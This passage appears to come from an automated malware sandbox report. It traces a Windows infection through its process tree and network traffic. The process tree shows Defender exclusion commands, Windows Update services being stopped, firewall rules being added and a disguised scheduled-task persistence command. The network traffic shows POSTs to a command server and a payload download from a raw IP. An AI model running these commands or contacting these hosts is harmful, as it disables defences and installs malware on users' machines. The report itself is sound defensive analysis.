        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:5328
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      Loads dropped DLL
      PID:1576
- C:\Users\Admin\AppData\Local\Temp\CA37.exe
  C:\Users\Admin\AppData\Local\Temp\CA37.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3976
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5972
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:5888
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:5796
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:640
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      PID:5632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:748
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2972
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Modifies data under HKEY_USERS
        
        PID:4540
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:3240
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4676
- - C:\Users\Admin\AppData\Local\Temp\source1.exe
    "C:\Users\Admin\AppData\Local\Temp\source1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:1048
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4576
- C:\Users\Admin\AppData\Local\Temp\D11D.exe
  C:\Users\Admin\AppData\Local\Temp\D11D.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5284
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 804
    3⤵
    - Program crash
    PID:5184
- C:\Users\Admin\AppData\Local\Temp\D40C.exe
  C:\Users\Admin\AppData\Local\Temp\D40C.exe
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Users\Admin\AppData\Local\Temp\DA47.exe
  C:\Users\Admin\AppData\Local\Temp\DA47.exe
  2⤵
  - Executes dropped EXE
  PID:5232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4468
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5644
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:6080
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3080
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5264
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5348
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5612
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1060
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1392
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5280
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3636
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4664
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Modifies data under HKEY_USERS
  PID:5108
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2768
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5828
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1784
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1492
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6020
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4700
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4936
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5912
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3748
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3536
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:5152
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4380 -ip 4380
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2804 -ip 2804
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1048 -ip 1048
1⤵
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2020 -ip 2020
1⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2344 -ip 2344
1⤵
PID:4856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 388 -ip 388
1⤵
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4676 -ip 4676
1⤵
PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5796 -ip 5796
1⤵
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3776 -ip 3776
1⤵
PID:2204

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5284 -ip 5284
1⤵
PID:2000

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:6024

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:4056

Network

DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

121.208.253.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.208.253.8.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

208.194.73.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.194.73.20.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:gSG7Z09yZHI12VBO5JJv4dPxZo5qRA:tAdqQWAiZvKeI-Si
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcQiayO93EaFRSgk19TougBBUNAEUeCkIuZKp2BcH7nlb_rI4OQOcxns_UQVA6Wcc-3hLPWfQ

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcQiayO93EaFRSgk19TougBBUNAEUeCkIuZKp2BcH7nlb_rI4OQOcxns_UQVA6Wcc-3hLPWfQ HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:gSG7Z09yZHI12VBO5JJv4dPxZo5qRA:tAdqQWAiZvKeI-Si
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.231.1
DNS

1.231.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.231.240.157.in-addr.arpa

IN PTR

Response

1.231.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-fco2fbcdnnet
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.201.35
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.231.35
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.251.36.14:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

35.231.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.231.240.157.in-addr.arpa

IN PTR

Response

35.231.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-fco2facebookcom
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nivjhigayr.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 196
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gnoups.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 134
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://juraotr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gbafevl.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 310
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lhadg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mnnnp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 198
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gpkktw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 124
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nrilljwnb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 127
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rbjgwuk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 209
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://taggk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 139
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hbwkf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 336
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qwixcm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 220
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://etmylbecd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 254
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cvufkeww.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 366
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.231.35
GET

http://5.42.65.80/rinkas.exe

Explorer.EXE

Remote address:

5.42.65.80:80

Request

